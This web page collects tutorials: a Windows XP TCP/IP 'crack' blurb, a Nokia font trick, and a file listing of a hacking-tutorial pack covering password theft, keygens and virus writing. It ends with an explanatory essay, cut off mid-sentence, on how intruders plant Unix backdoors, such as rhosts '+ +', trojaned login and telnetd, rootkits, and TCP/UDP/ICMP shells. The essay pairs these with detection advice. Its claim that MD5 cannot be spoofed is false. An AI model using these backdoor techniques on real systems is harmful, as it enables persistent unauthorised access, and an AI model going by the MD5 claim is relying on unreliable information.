Tutorials

This crack is designed only for all versions of WIndows XP SP3.
By increasing the number of TCP/IP connections allowed at one time, your internet speeds up, especially when you are downloading stuff or playing online games. I recommend you to set the limitation to 500 to 600.

Before applying the crack, remember to unplug internet connections and restart computer to make sure the TCP/IP file is not in use.

how to change your phone font manually

1. Copy your favourite fonts gdr file to this directory using any good File Manager
C:\system\fonts

2. Copy all the fonts file that you like to the directory
If they are more then one! DON'T WORRY just copy.

3. And after that rename the gdr font file which you like to set-Rename it to " 01***.gdr "
4. Leave other fonts as usual.

******EXAMPLE*****

IF there are five different fonts in your c:\system\fonts directory. And they are as following!

MysteriOus Times New Roman
MystariOus Cosmic Sans Ms
MysteriOus Cursive Ms
MysteriOus Arial Black
MysteriOus Bazooka

NOW !

If you want to set the Times New Roman Font instead of Default Nokia fonts.
Then rename the Times New Roman Font As "01 Times New Roman"

And restart the phone.

See the Effact-Its amaizing trick developed By MysteriOus.

THE FONT DIRECTORY MUST BE : C:\SYSTEM\FONTS
IF IT DOES NOT EXIST YOU MUST CREAT IT.

**************

You should prefix 01 to ur favourate font and when you want to change the font you must pre fix 00 to another font and restart the phone.

**************

in short the first one in the list - phone will accept as its fonts.

**************

IT WAS THE TRICK!
NOW U R ABLE TO CHANGE THE PHONES FONT WITHOUT ANY APPLICATION.
I M DOING THIS TRICK FOR A LONG TIME.
IT IS 100% WORKING IN ALL S60 PHONES

1000 Hacking Tutorials the best of 2008

Includes The Following:

Create Bootable XP SP integrated CD,Create One-click Shutdown And Reboot Shortcuts.txt Creating a Board aka Forum on your own PC !.rtf
Creating Universal Ghost Usb Boot Disk And Cd.txt
Data Capacity of CDs [Tutorial].txt ,Debug, Learn how ***** windows.txt,Delete An undeletable File.txt,Delete Files From The Recent File List In Windows.txt,Digital Camera Guide.txt
Digital Faq -learn Everything About Digital, Capture, Edit and Burning and more.txt 2.20 kB
Digital Photo Id Cards, Greate Info.txt 2.88 kB
Direct Link To Any Page You Want To In Hotmail.txt 1.95 kB
Directx Explained.txt 7.66 kB
Disable Compression On Xp, NTFS partition, Disk Cleanup.txt 0.43 kB
Disable The Send Error Report, to Microsoft.txt 0.51 kB
Disable Windows Logo Key.txt 0.62 kB
Discover New Music You'll Probably Love.txt 1.08 kB
Download Free Music legally,, legally.txt 3.24 kB
Download from a paypal site without paying a penny!.txt 0.95 kB
Download From Ftpz, Using Ftp Search Sitez.txt 8.12 kB
Download Mp3's Without Using Filesharing.txt 0.69 kB
Download Music And Video With ,edia Player9, quick and easy!.txt 0.66 kB

Download Timeframes.txt 0.33 kB
Dual Boot After The Fact.txt 1.37 kB
Dvd Copying-ripping Definitions.txt 1.25 kB
DVD Regions Information.txt 3.84 kB
Dvd-9 to Dvd+r Dl, Double Layer To Double Layer, 1-1 copies.txt 0.94 kB
Easily Disconnect-reconnect From Broadband.txt 0.30 kB
Easily Find Serial Numbers On Google.., easy to do and works like a charm..txt 1.40 kB
Ebay Hack*****tip.txt 0.50 kB
General Keyboard Shortcuts.txt 7.54 kB
Get In Windows 2000 As Administrator.txt 0.39 kB
Get the Most Out of Your DVD Recorder.txt 11.25 kB
Get The Music You Want To Hear.txt 0.90 kB
Get unlimited bandwidth from your host for free.txt 2.88 kB
Getting A 1gb Yahoo China Account.txt 0.98 kB
Getting Counter-strike Source To Work.txt 3.36 kB
getting movies, mp3,games using google.txt 0.75 kB
Getting older programs to run on Windows XP.txt 2.96 kB
Getting started with Linux for nOObs!.txt 17.37 kB
Go to Windows updates anonymously.txt 0.40 kB
Google ***** Search.txt 0.14 kB
Google secrets.txt 0.98 kB
Google Tips & Tricks, (utilizing search engine).txt 5.81 kB
Graffiti On Walls 4 Adobe Photoshop Cs 8.0.txt 2.45 kB
Guide For Getting Free Stuff.txt 10.33 kB
Guide to IIS Exploitation.txt 27.77 kB
Guide to Slipstreaming Service Pack 2.txt 2.82 kB
Hard drive Gone Bad.txt 5.55 kB
Hardware Firewall.txt 3.02 kB
How To Add An Option To Print, the Contents of a Folder!.txt 1.47 kB
How To Add Your Own Windows Tips.txt 0.48 kB
How to Back Up the Registry.txt 0.76 kB
How To Backup Ps2 Games.txt 7.71 kB
HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING.txt 1.51 kB
How To Block Websties Without Software, block websites.txt 0.64 kB
How To Boot Xp Faster (updated).txt 1.66 kB
How to build a black box.txt 7.79 kB
how to burn quicker in windows xp.txt 0.28 kB
How to Bypass BIOS Passwords.txt 9.05 kB
How To Bypass Web Filters, tutorial.txt 6.20 kB
HOW TO CAPTURE STREAMING MEDIA.txt 1.68 kB
How To Change A Cmos Battery.txt 3.18 kB
How to change the serial number used in Windows XP, Valid for XP Corporate.txt 1.11 kB
How To Change Thumbnail Size And Quality.txt 0.90 kB
How to clear Bios info 2.txt 23.55 kB
How to clear Bios info.txt 11.75 kB
How To Convert File System, fat - fat32 to ntfs.txt 0.52 kB
How To Copy A Dvd Which Will Play On A X Box.txt 1.01 kB
How to copy songs from your iPod to your PC.txt 1.40 kB
How To Customise Your start Button.txt 1.54 kB
How To Delete Those Persistent Nasty Files.txt 0.53 kB
How To Directly Go To Inbox, Write Msg, w Hotmail, no need for How to find MP3's real quickly.txt 0.35 kB
How To Find Serial Numbers On Google.txt 0.79 kB
How to fix corrupted files in XP.txt 1.48 kB
How to fix Windows Installer problem.txt 0.96 kB
How To Get A Free I-pod Or Flat Screen Tv, check it out.txt 6.62 kB
HOW TO GET ANY WINDOWS PASSWORD.txt 3.41 kB
How to Get someones ISP password, Get free internet.txt 2.65 kB
How To Get Top Ranking, Search Engines.txt 6.58 kB
How To Hack Windows Xp Admin Passwords.txt 2.52 kB
How to hack-change your Windows XP Boot Screen.txt 1.52 kB
how To Hide Yourself From Network Users!, And give access to only specific users!.txt 0.86 kB
How To Make An Animted Logo.txt 5.26 kB
How To Make Free Phone Calls.txt 2.29 kB
How to make key generators.txt 8.83 kB
How To Make Perfect Copies Of Maxis The Sims Discs, CloneCD Style!.txt 1.17 kB
How To Make XP Go Faster.txt 5.58 kB
How To make your own Radio Station 2.txt 3.26 kB
How To Make Your Own Radio Station.txt 1.58 kB
How to Remove DRM Protection for Video Files.txt 2.29 kB
How To Remove Ms Java Vm And Install Sun Java.txt 0.05 kB
How To Remove Signin Details Of Msn Passport.txt 1.04 kB
How To Remove The Default Admin$ Shares.txt 1.03 kB
How to remove the Links folder in IE Favorites.txt 0.59 kB
How to Remove WinXP Splash and See Operations.txt 1.19 kB
How To Rename Extensions With Ease, with a Renamer.bat file!.txt 0.44 kB
How to Rename File Extensions.txt 3.11 kB
How To Rename Multiple Files In Winxp.txt 0.56 kB
How To Restrict Login Hours Allowed.txt 0.58 kB
How to safeguard your files when computer crashes.txt 2.94 kB
How to save Windows xp updates.txt 0.63 kB
how to search google for RAPIDSHARE links.txt 0.98 kB
How To See Hidden Files, Using Dos.txt 0.08 kB
How To Set search For All Files In Winxp.txt 0.71 kB
How to set up a http server running from you computer.txt 3.06 kB
How To Set Up A Proxy In Flashget, As Requested.txt 0.66 kB
How to set up a server with Apache , PHP , MySQL , Perl , phpMyAdmin.txt 8.77 kB
How To Set Up Direct Connect.txt 26.96 kB
HOW TO SET UP FTP SERVER.txt 1.79 kB
How To Set Up Proxies In Your Browser.txt 1.63 kB
How To Set Zone Alarm Settings!, Fix for ZA ports.txt 2.12 kB
How To Setup Your Own Dns (Domain Name Server).txt 6.97 kB
How To Speed Up A Slow Computer.txt 1.21 kB
How To Speed Up Http Requests On Internet Explorer, as above.txt 1.28 kB
How To Stop Spam.txt 8.05 kB
How to swear in all languages.txt 28.32 kB
How To Unload Cached Dll Files To Free Memory.txt 0.56 kB
How to Use and How to Chain Multiple Proxies!.txt 9.70 kB
How To Use File Compression In Windows Xp.txt 4.19 kB
How To Use Google To Download Mp3's, and applications.....txt 0.60 kB
How To Use Newsgroups.txt 0.56 kB
How To Use You Gmail With Msn Messenger.txt 0.37 kB
How-to Get Videos And Dvds Onto Your Sony PlayStation Portable (PSP) for free.txt 12.91 kB
HOWTO Change Windows XP Home to Windows XP Pro.txt 1.67 kB
Important Faqs For Sp2.txt 9.47 kB
Improve Doom 3's Performances!!, simple but efficient trick for every1.txt 4.22 kB
Improve your dialup modem preformance.txt 0.73 kB
Increase XP Folder Settings.txt 0.79 kB
Insert Your Serial For Office 2k, auto install office.txt 1.06 kB
Install A New Hard-disk.txt 5.16 kB
Install Xp From Dos.txt 0.84 kB
Installing Apache on Windows.txt 6.29 kB
Installing Gentoo Linux, Amazing step by step tutoria.txt 0.19 kB
Installing IIS On Windows Xp Pro.txt 3.04 kB
Installing Slackware Linux.txt 34.73 kB
Instructions For Removal Of Advertising In Msn Messenger.txt 2.59 kB
Ip Address Structure, Expilinatin OF IP Address {A short way}.txt 7.65 kB
Irc How To Downlaod From, How to downlaod from IRC.txt 3.95 kB
Irc Servers On nix, For people who want to start own IRC net.txt 0.48 kB
Keep Files Private.txt 1.51 kB
Keep Folders Hidden.txt 0.46 kB
Keyboard Shortcuts Result in Excel 2000 - Movement.txt 1.57 kB
Keyboard Shortcuts, Microsoft Word.txt 2.37 kB
Keyboard Shortcuts, must read.txt 3.72 kB
Kill Microsoft Instant Messenger.txt 0.28 kB
Lamination Tips, Its a Fast TUT......txt 1.98 kB
Leet Way To Get Your Ip In Windows Xp.txt 0.26 kB
Linking Your Xbox To Your Computer.txt 33.52 kB
Linux Howto's.txt 0.08 kB
List Of Sites Not To Go To.txt 4.32 kB
Little help for anonymous mailer.txt 1.56 kB
Lots Of Windows Xp Tips, Take A Look !.txt 12.43 kB
Lyrics With Google.txt 0.08 kB
Make A Autorun File For Ur Cd.txt 0.66 kB
Make A Batch File To Clean UR PC!!, All In One!!.txt 1.37 kB
Make A Roughly 16 Hour Video Dvd.txt 1.01 kB
Make Acrobat Reader 6 load faster.txt 0.42 kB
Make Dvd Iso From Suse 9.2 5 Cds Iso, Linux mode and Windows mode ISO creation.txt 7.41 kB
Make Mp3 Files Smaller Without Losing Quality.txt 0.73 kB
Make Your Own Ringtones For Mobile Phone, also logos, wallpaper, etc.txt 3.00 kB
Make Your Pc Faster, Guaranteed.txt 6.23 kB
MakeXPgoFaster.txt 5.74 kB
making a .cue file, in notepad.txt 0.53 kB
Making A .txt Executable Server.txt 1.60 kB
Making Bootable Floppy Disk to Boot into Windows.txt 4.82 kB
Making Cd Version Of Doom3 Into Dvd Version.txt 0.75 kB
Making Web Page Fonts Consistent and Uniform.txt 0.80 kB
Manage Saved Ie Passwords.txt 0.75 kB
Mastering The Windows XP Registry.txt 5.79 kB
Maximize Dial-up Modem Settings.txt 2.31 kB
Microsoft's Really Hidden Files, Reveled Hidden files.txt 33.95 kB
mIRC Not Just Another Chat Client, Download Anything You Want Almost.txt 4.37 kB
mIRCcommands.txt 10.10 kB
Misc Linux Tips & Tricks.txt 18.55 kB
Missing Administrator Account.txt 0.52 kB
Mobile Secret Codes.txt 31.09 kB
Modify .exe Files And ***** A Program.txt 3.06 kB
More Hacking/A beginners guide to Hacking UNIX.txt 5.61 kB
More Hacking/A *****ing Tutorial/C101-90.000 3.85 kB
More Hacking/A *****ing Tutorial/C101-90.001 32.32 kB
More Hacking/A *****ing Tutorial/C101-90.002 30.93 kB
More Hacking/A *****ing Tutorial/C101-90.003 14.75 kB
More Hacking/A *****ing Tutorial/C101-90.004 54.91 kB
More Hacking/A *****ing Tutorial/ED!SON.NFO 1.58 kB
More Hacking/A Guide to Internet Security- Becoming an Ueber*****er.txt 8.56 kB
More Hacking/A Guide to the Easiest Hacking there is.txt 4.58 kB
More Hacking/A List Of Some OF The Most Useful UNIX Hacking Commands.htm 23.03 kB
More Hacking/A Small Guide to Hacking HOTMAIL.txt 3.02 kB
More Hacking/A UNIX Hacking Tutorial.txt 82.20 kB
More Hacking/Almost Everything You Ever Wanted To Know About Security (but.txt 47.52 kB
More Hacking/An Indepth Guide in Hacking UNIX and the concept of Basic Net.txt 40.84 kB
More Hacking/An Introduction to Denial of Service.txt 44.78 kB
More Hacking/An Introduction to the Computer Underground.txt 17.03 kB
More Hacking/Basic Networking.txt 14.04 kB
More Hacking/BBS Crashing Techniques.txt 3.72 kB
More Hacking/BRUTE- A brute force approach to hacking Unix passwords.txt 3.31 kB
More Hacking/Closing the Net.txt 30.69 kB
More Hacking/Compression and *****s for Dummies.txt 52.75 kB
More Hacking/Computer Bulliten Boards and the Law.txt 56.06 kB
More Hacking/Computer Chrime - Current Practices, Problems and Proposed So.txt 96.53 kB
More Hacking/Computer eMail and Privacy.txt 19.18 kB
More Hacking/Computer Hackers News Articles.txt 5.89 kB
More Hacking/Computer Rights vs First and Forth Amentment Right.txt 44.24 kB
More Hacking/Computer Security.txt 63.52 kB
More Hacking/Computer Security_2.txt 51.94 kB
More Hacking/Computer Viruii.txt 19.98 kB
More Hacking/Computerized Governmental Database Systems Containing Persona.txt 40.34 kB
More Hacking/COPS and Robbers-Unix System Security.txt 35.18 kB
More Hacking/Copyright Guides for Photographers.txt 17.02 kB
More Hacking/Crash Course in X Windows Security.txt 12.45 kB
More Hacking/Crime and Puzzlement.txt 62.34 kB
More Hacking/Cultural Formations in Text-Based Virtual Realties.txt 257.27 kB
More Hacking/Cyberspace and the Legal Matrix- Laws or Confusion.txt 20.53 kB
More Hacking/Dark Angel's Phunky Virus Writing Guide .txt 18.90 kB
More Hacking/Defamation Liability of Computerized Bulliten Board Operators.txt 101.36 kB
More Hacking/Dept of Treasury Letter.txt 11.25 kB
More Hacking/Electronic Bulliten Boards and 'Public Goods' Explainations o.txt 45.84 kB
More Hacking/Electropolos - Communication and Comunity on IRC.txt 112.45 kB
More Hacking/Ethload User's Guide.txt 81.28 kB
More Hacking/Formulating A Company Policy on Access to and Use and Disclos.txt 12.14 kB
More Hacking/Free Speech in Cyberspace.txt 244.25 kB
More Hacking/Gender Issues in Online Communications.txt 24.86 kB
More Hacking/Government Computer Security Techniques.txt 7.88 kB
More Hacking/HACKDICT.TXT 272.00 kB
More Hacking/Hacker Test.txt 20.84 kB
More Hacking/Hackers A-Z.TXT 256.00 kB
More Hacking/Hackers Who Break into Computer Systems.txt 57.40 kB
More Hacking/Hacking Bank Of America's Home Banking System.txt 5.79 kB
More Hacking/Hacking Compuserve Infomation Service.txt 7.43 kB
More Hacking/Hacking Faq.txt 42.06 kB
More Hacking/Hacking GTE Telemail.txt 19.12 kB
More Hacking/Hacking IRC - The Definitive Guide.txt 13.72 kB
More Hacking/Hacking PC-Pursuit Codes.txt 8.10 kB
More Hacking/Hacking Techniques.txt 8.52 kB
More Hacking/Hacking TRW.txt 2.58 kB
More Hacking/Hacking TYMNET.txt 5.79 kB
More Hacking/Hacking Unix System V's.txt 10.93 kB
More Hacking/Hacking Wal-Mart Computers.txt 4.09 kB
More Hacking/Hacking Webpages.txt 3.90 kB
More Hacking/How the Traditional Media Clasifications Fail to Protect in t.txt 40.50 kB
More Hacking/How to crash AOL.txt 4.75 kB
More Hacking/How to dial out of a UNIX System.txt 3.49 kB
More Hacking/How to find Security Holes.txt 15.99 kB
More Hacking/How to get a Shell in 24 hours.txt 7.98 kB
More Hacking/How to Hack UNIX System V.txt 10.93 kB
More Hacking/How to login to a C.B.I. System.txt 3.00 kB
More Hacking/How to send ICQ Bombs.txt 2.33 kB
More Hacking/Information of Hacking AngelFire Websites.txt 3.21 kB
More Hacking/Introduction to Denail of Service.txt 44.78 kB
More Hacking/IP addressing, and gaining IP's.txt 13.70 kB
More Hacking/IP Addressing.txt 13.70 kB
More Hacking/ISSN Numbers- An Introduction.txt 5.96 kB
More Hacking/Junk Mail- How Did They All Get My Address.txt 12.70 kB
More Hacking/LENROS~1.TXT 184.58 kB
More Hacking/LENROS~2.TXT 7.41 kB
More Hacking/MEMETICS.TXT 45.79 kB
More Hacking/MINDVOX.TXT 64.57 kB
More Hacking/MORRIS~1.TXT 31.18 kB
More Hacking/NEIDOR~1.TXT 41.02 kB
More Hacking/NFS Tracing.txt 34.20 kB
More Hacking/Nightline- FBI,Privacy,and Proposed Wire-Tapping Legislation.txt 20.86 kB
More Hacking/NY_2'S Guide to Obtaining An IP Address. .doc 10.50 kB
More Hacking/Organizational Analysis in Computer Science.txt 65.00 kB
More Hacking/PGP Startup Guide.htm 26.00 kB
More Hacking/Presumed Guilty.txt 153.76 kB
More Hacking/Raising Hell with Unix.txt 12.91 kB
More Hacking/Remarks of the President and Vice President to Silicon Valley.txt 37.70 kB
More Hacking/RIGGSB~1.TXT 54.03 kB
More Hacking/RIGGS_~1.TXT 54.03 kB
More Hacking/RIGHTS~1.TXT 7.99 kB
More Hacking/RIVERA.TXT 26.43 kB
More Hacking/Security holes.txt 11.77 kB
More Hacking/Seisure Warrent Documents for Ripco BBS.txt 72.01 kB
More Hacking/Site Security Handbook.txt 247.43 kB
More Hacking/SJ-DEC~1.TXT 45.03 kB
More Hacking/SJ-RESP.TXT 69.59 kB
More Hacking/SMTP-Simple Mail Transfer Protocol.txt 117.61 kB
More Hacking/Summary of FBI Computer Systems.txt 5.07 kB
More Hacking/SUNDEVIL.TXT 100.17 kB
More Hacking/SUPREM~1.TXT 56.70 kB
More Hacking/TCP packet fragment attacks against firewalls and filters.txt 4.39 kB
More Hacking/Telenet-The Secret Exposed.txt 9.91 kB
More Hacking/The Basics of Hacking- Introduction.txt 24.82 kB
More Hacking/The Baudy World of the Byte Bandit-A Postmodernist Interpreta.txt 85.17 kB
More Hacking/The Constitution in Cyberspace.txt 46.60 kB
More Hacking/The *****ing Manual.txt 86.38 kB
More Hacking/The Electronic Communication Privacy Act of 1986 - A Laymans .txt 10.04 kB
More Hacking/The Greatest Hacker of all time.ASC 25.02 kB
More Hacking/The Hacker's League.txt 12.37 kB
More Hacking/The Inner Circle Book's Hacking Techniques.txt 1.96 kB
More Hacking/The Lamahs-Guide to Pirating Software on the Internet.txt 12.21 kB
More Hacking/The M.M.C. Guide to Hacking, Phreaking, Carding.txt 19.11 kB
More Hacking/The National Information Infrastructure-Agenda for Action.txt 96.49 kB
More Hacking/The Newbies Handbook- ' How to beging in the World of Hacking.txt 43.83 kB
More Hacking/The Newbies-User's Guide to Hacking.txt 47.35 kB
More Hacking/The Pre-History of Cyberspace.txt 60.25 kB
More Hacking/The Price of Copyright Violation.txt 73.11 kB
More Hacking/The REAL way to hack RemoteAccess.txt 12.12 kB
More Hacking/The Secret Service, UUCP,and The Legion of Doom.txt 19.63 kB
More Hacking/the UNIX operating system (Berkley 4.2).txt 13.55 kB
More Hacking/Theft of Computer Software-A National Security Threat.txt 12.22 kB
More Hacking/Thoughts on the National Research and Education Network.txt 19.72 kB
More Hacking/Tips on Starting Your Own BBS.1 8.04 kB
More Hacking/undocumented DOS commands.txt 23.17 kB
More Hacking/UNIX Computer Security Checklist.0 49.34 kB
More Hacking/UNIX Use and Security - By the Prophet.txt 153.74 kB
More Hacking/UNIX Use and Security From The Ground Up.htm 135.60 kB
More Hacking/UNIX- A Hacking Tutorial.SIR 82.26 kB
More Hacking/Viruii FAQ.txt 4.07 kB
More Hacking/Virus-Trojan FAQ.txt 1.95 kB
More Hacking/What Files are Legal for Distribution on a BBS.txt 20.83 kB
More Hacking/What To Look For In A Code Hacking Program.htm 5.56 kB
More Hacking/What To Look For In A Code Hacking Program.txt 5.46 kB
More Hacking/What You Should Know About Computer Viruses.DNA 16.91 kB
More Xp Tips and tricks make your computer more faster.txt 46.14 kB
Moving and Removing the Start Button.txt 0.66 kB
Msn Messenger & Gmail.txt 3.69 kB
My Flash Bookmarks, long list of tutorials.txt 2.98 kB
Myth about WPA ( How it is done ), Windows Product Activation Technique.txt 45.54 kB
Your Own Home Server - Introduction.txt 11.25 kB

System Backdoor Explained

Alright lets tidy things up...I am not respnsible for what you do from the knowledge

accquired from this explanatory tutorial I wrote.....

Since the early days of intruders breaking into computers, they have tried

to develop techniques or backdoors that allow them to get back into the

system. In this paper, it will be focused on many of the common backdoors

and possible ways to check for them. Most of focus will be on Unix

backdoors with some discussion on future Windows NT backdoors. This will

describe the complexity of the issues in trying to determine the methods

that intruders use and the basis for administrators understanding on how

they might be able to stop the intruders from getting back in. When an

administrator understands how difficult it would be to stop intruder once

they are in, the appreciation of being proactive to block the intruder from

ever getting in becomes better understood. This is intended to cover many

of the popular commonly used backdoors by beginner and advanced intruders.

This is not intended to cover every possible way to create a backdoor as

the possibilities are limitless.

The backdoor for most intruders provide two or three main functions:

Be able to get back into a machine even if the administrator tries to

secure it, e.g., changing all the passwords.

Be able to get back into the machine with the least amount of visibility.

Most backdoors provide a way to avoid being logged and many times the

machine can appear to have no one online even while an intruder is using

it.

Be able to get back into the machine with the least amount of time. Most

intruders want to easily get back into the machine without having to do all

the work of exploiting a hole to gain access.

In some cases, if the intruder may think the administrator may detect any

installed backdoor, they will resort to using the vulnerability repeatedly

to get on a machine as the only backdoor. Thus not touching anything that

may tip off the administrator. Therefore in some cases, the

vulnerabilities on a machine remain the only unnoticed backdoor.

Password Cracking Backdoor

One of the first and oldest methods of intruders used to gain not only

access to a Unix machine but backdoors was to run a password cracker. This

uncovers weak passworded accounts. All these new accounts are now possible

backdoors into a machine even if the system administrator locks out the

intruder's current account. Many times, the intruder will look for unused

accounts with easy passwords and change the password to something

difficult. When the administrator looked for all the weak passworded

accounts, the accounts with modified passwords will not appear. Thus the

administrator will not be able to easily determine which accounts to lock

out.

Rhosts + + Backdoor

On networked Unix machines, services like Rsh and Rlogin used a simple

authentication method based on hostnames that appear in rhosts. A user

could easily configure which machines not to require a password to log

into. An intruder that gained access to someone's rhosts file could put a

"+ +" in the file and that would allow anyone from anywhere to log into

that account without a password. Many intruders use this method especially

when NFS is exporting home directories to the world. These accounts

become backdoors for intruders to get back into the system. Many intruders

prefer using Rsh over Rlogin because it is many times lacking any logging

capability. Many administrators check for "+ +" therefore an intruder may

actually put in a hostname and username from another compromised account on

the network, making it less obvious to spot.

Checksum and Timestamp Backdoors

Early on, many intruders replaced binaries with their own trojan versions.

Many system administrators relied on time-stamping and the system checksum

programs, e.g., Unix's sum program, to try to determine when a binary file

has been modified. Intruders have developed technology that will recreate

the same time-stamp for the trojan file as the original file. This is

accomplished by setting the system clock time back to the original file's

time and then adjusting the trojan file's time to the system clock. Once

the binary trojan file has the exact same time as the original, the system

clock is reset to the current time. The sum program relies on a CRC

checksum and is easily spoofed. Intruders have developed programs that

would modify the trojan binary to have the necessary original checksum,

thus fooling the administrators. MD5 checksums is the recommended choice

to use today by most vendors. MD5 is based on an algorithm that no one has

yet to date proven can be spoofed.

Login Backdoor

On Unix, the login program is the software that usually does the password

authentication when someone telnets to the machine. Intruders grabbed the

source code to login.c and modified it that when login compared the user's

password with the stored password, it would first check for a backdoor

password. If the user typed in the backdoor password, it would allow you to

log in regardless of what the administrator sets the passwords to. Thus

this allowed the intruder to log into any account, even root. The

password backdoor would spawn access before the user actually logged in and

appeared in utmp and wtmp. Therefore an intruder could be logged in and

have shell access without it appearing anyone is on that machine as that

account. Administrators started noticing these backdoors especially if

they did a "strings" command to find what text was in the login program.

Many times the backdoor password would show up. The intruders then

encrypted or hid the backdoor password better so it would not appear by

just doing strings. Many of the administrators can detect these backdoors

with MD5 checksums.

Telnetd Backdoor

When a user telnets to the machine, inetd service listens on the port and

receive the connection and then passes it to in.telnetd, that then runs

login. Some intruders knew the administrator was checking the login

program for tampering, so they modified in.telnetd. Within in.telnetd, it

does several checks from the user for things like what kind of terminal the

user was using. Typically, the terminal setting might be Xterm or VT100.

An intruder could backdoor it so that when the terminal was set to

"letmein", it would spawn a shell without requiring any authentication.

Intruders have backdoored some services so that any connection from a

specific source port can spawn a shell.

Services Backdoor

Almost every network service has at one time been backdoored by an

intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even

inetd, etc., have been floating around forever. There are programs that

are nothing more than a shell connected to a TCP port with maybe a backdoor

password to gain access. These programs sometimes replace a service like

uucp that never gets used or they get added to the inetd.conf file as a new

service. Administrators should be very wary of what services are running

and analyze the original services by MD5 checksums.

Cronjob backdoor

Cronjob on Unix schedules when certain programs should be run. An intruder

could add a backdoor shell program to run between 1 AM and 2 AM. So for 1

hour every night, the intruder could gain access. Intruders have also

looked at legitimate programs that typically run in cronjob and built

backdoors into those programs as well.

Library backdoors

Almost every UNIX system uses shared libraries. The shared libraries are

intended to reuse many of the same routines thus cutting down on the size

of programs. Some intruders have backdoored some of the routines like

crypt.c and _crypt.c. Programs like login.c would use the crypt() routine

and if a backdoor password was used it would spawn a shell. Therefore,

even if the administrator was checking the MD5 of the login program, it was

still spawning a backdoor routine and many administrators were not checking

the libraries as a possible source of backdoors.

One problem for many intruders was that some administrators started MD5

checksums of almost everything. One method intruders used to get around

that is to backdoor the open() and file access routines. The backdoor

routines were configured to read the original files, but execute the trojan

backdoors. Therefore, when the MD5 checksum program was reading these

files, the checksums always looked good. But when the system ran the

program, it executed the trojan version. Even the trojan library itself,

could be hidden from the MD5 checksums. One way to an administrator could

get around this backdoor was to statically link the MD5 checksum checker

and run on the system. The statically linked program does not use the

trojan shared libraries.

Kernel backdoors

The kernel on Unix is the core of how Unix works. The same method used for

libraries for bypassing MD5 checksum could be used at the kernel level,

except even a statically linked program could not tell the difference. A

good backdoored kernel is probably one of the hardest to find by

administrators, fortunately kernel backdoor scripts have not yet been

widely made available and no one knows how wide spread they really are.

File system backdoors

An intruder may want to store their loot or data on a server somewhere

without the administrator finding the files. The intruder's files can

typically contain their toolbox of exploit scripts, backdoors, sniffer

logs, copied data like email messages, source code, etc. To hide these

sometimes large files from an administrator, an intruder may patch the

files system commands like "ls", "du", and "fsck" to hide the existence of

certain directories or files. At a very low level, one intruder's backdoor

created a section on the hard drive to have a proprietary format that was

designated as "bad" sectors on the hard drive. Thus an intruder could

access those hidden files with only special tools, but to the regular

administrator, it is very difficult to determine that the marked "bad"

sectors were indeed storage area for the hidden file system.

Bootblock backdoors

In the PC world, many viruses have hid themselves within the bootblock

section and most antivirus software will check to see if the bootblock has

been altered. On Unix, most administrators do not have any software that

checks the bootblock, therefore some intruders have hidden some backdoors

in the bootblock area.

Process hiding backdoors

An intruder many times wants to hide the programs they are running. The

programs they want to hide are commonly a password cracker or a sniffer.

There are quite a few methods and here are some of the more common:

An intruder may write the program to modify its own argv[] to make it look

like another process name.

An intruder could rename the sniffer program to a legitimate service like

in.syslog and run it. Thus when an administrator does a "ps" or looks at

what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show

all the processes.

An intruder could patch a backdoor or program into an interrupt driven

routine so it does not appear in the process table. An example backdoor

using this technique is amod.tar.gz available on

http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

An intruder could modify the kernel to hide certain processes as well.

Rootkit

One of the most popular packages to install backdoors is rootkit. It can

easily be located using Web search engines. From the Rootkit README, here

are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.

Es - rokstar's ethernet sniffer for sun4 based kernels.

Fix - try to fake checksums, install with same dates/perms/u/g.

Sl - become root via a magic password sent to login.

Ic - modified ifconfig to remove PROMISC flag from output.

ps: - hides the processes.

Ns - modified netstat to hide connections to certain machines.

Ls - hides certain directories and files from being listed.

du5 - hides how much space is being used on your hard drive.

ls5 - hides certain files and directories from being listed.

Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, but also

they want to hide their network traffic as much as possible. These network

traffic backdoors sometimes allow an intruder to gain access through a

firewall. There are many network backdoor programs that allow an intruder

to set up on a certain port number on a machine that will allow access

without ever going through the normal services. Because the traffic is

going to a non-standard network port, the administrator can overlook the

intruder's traffic. These network traffic backdoors are typically using

TCP, UDP, and ICMP, but it could be many other kinds of packets.

TCP Shell Backdoors

The intruder can set up these TCP Shell backdoors on some high port number

possibly where the firewall is not blocking that TCP port. Many times,

they will be protected with a password just so that an administrator that

connects to it, will not immediately see shell access. An administrator

can look for these connections with netstat to see what ports are listening

and where current connections are going to and from. Many times, these

backdoors allow an intruder to get past TCP Wrapper technology. These

backdoors could be run on the SMTP port, which many firewalls allow traffic

to pass for e-mail.

UDP Shell Backdoors

Administrator many times can spot a TCP connection and notice the odd

behavior, while UDP shell backdoors lack any connection so netstat would

not show an intruder accessing the Unix machine. Many firewalls have been

configured to allow UDP packets for services like DNS through. Many times,

intruders will place the UDP Shell backdoor on that port and it will be

allowed to by-pass the firewall.

ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive by

sending and receiving ICMP packets. Many firewalls allow outsiders to ping

internal machines. An intruder can put data in the Ping ICMP packets and

tunnel a shell between the pinging machines. An administrator may notice a

flurry of Ping packets, but unless the administrator looks at the data in

the packets, an intruder can be unnoticed.

Encrypted Link

An administrator can set up a sniffer trying to see data appears as someone

accessing a shell, but an intruder can add encryption to the Network

traffic backdoors and it becomes almost impossible to determine what is

actually being transmitted between two machines.

Windows NT

Because Windows NT does not easily allow multiple users on a single machine

and remote access similar as Unix, it becomes harder for the intruder to

break into Windows NT, install a backdoor, and launch an attack from it.

Thus you will find more frequently network attacks that are spring boarded

from a Unix box than Windows NT. As Windows NT advances in multi-user

technologies, this may give a higher frequency of intruders who use Windows

NT to their advantage. And if this does happen, many of the concepts from

Unix backdoors can be ported to Windows NT and administrators can be ready

for the intruder. Today, there are already telnet daemons available for

Windows NT. With Network Traffic backdoors, they are very feasible for

intruders to install on Windows NT.

Solutions

As backdoor technology advances, it becomes even harder for administrators

to determine if an intruder has gotten in or if they have been successfully

locked out.

Assessment

One of the first steps in being proactive is to assess how vulnerable your

network is, thus being able to figure out what holes exist that should be

fixed. Many commercial tools exist to help scan and audit the network and

systems for vulnerabilities. Many companies could dramatically improve

their security if they only installed the security patches made freely

available by their vendors.

MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines.

This MD5 baseline should be built up before a hacker attack with clean

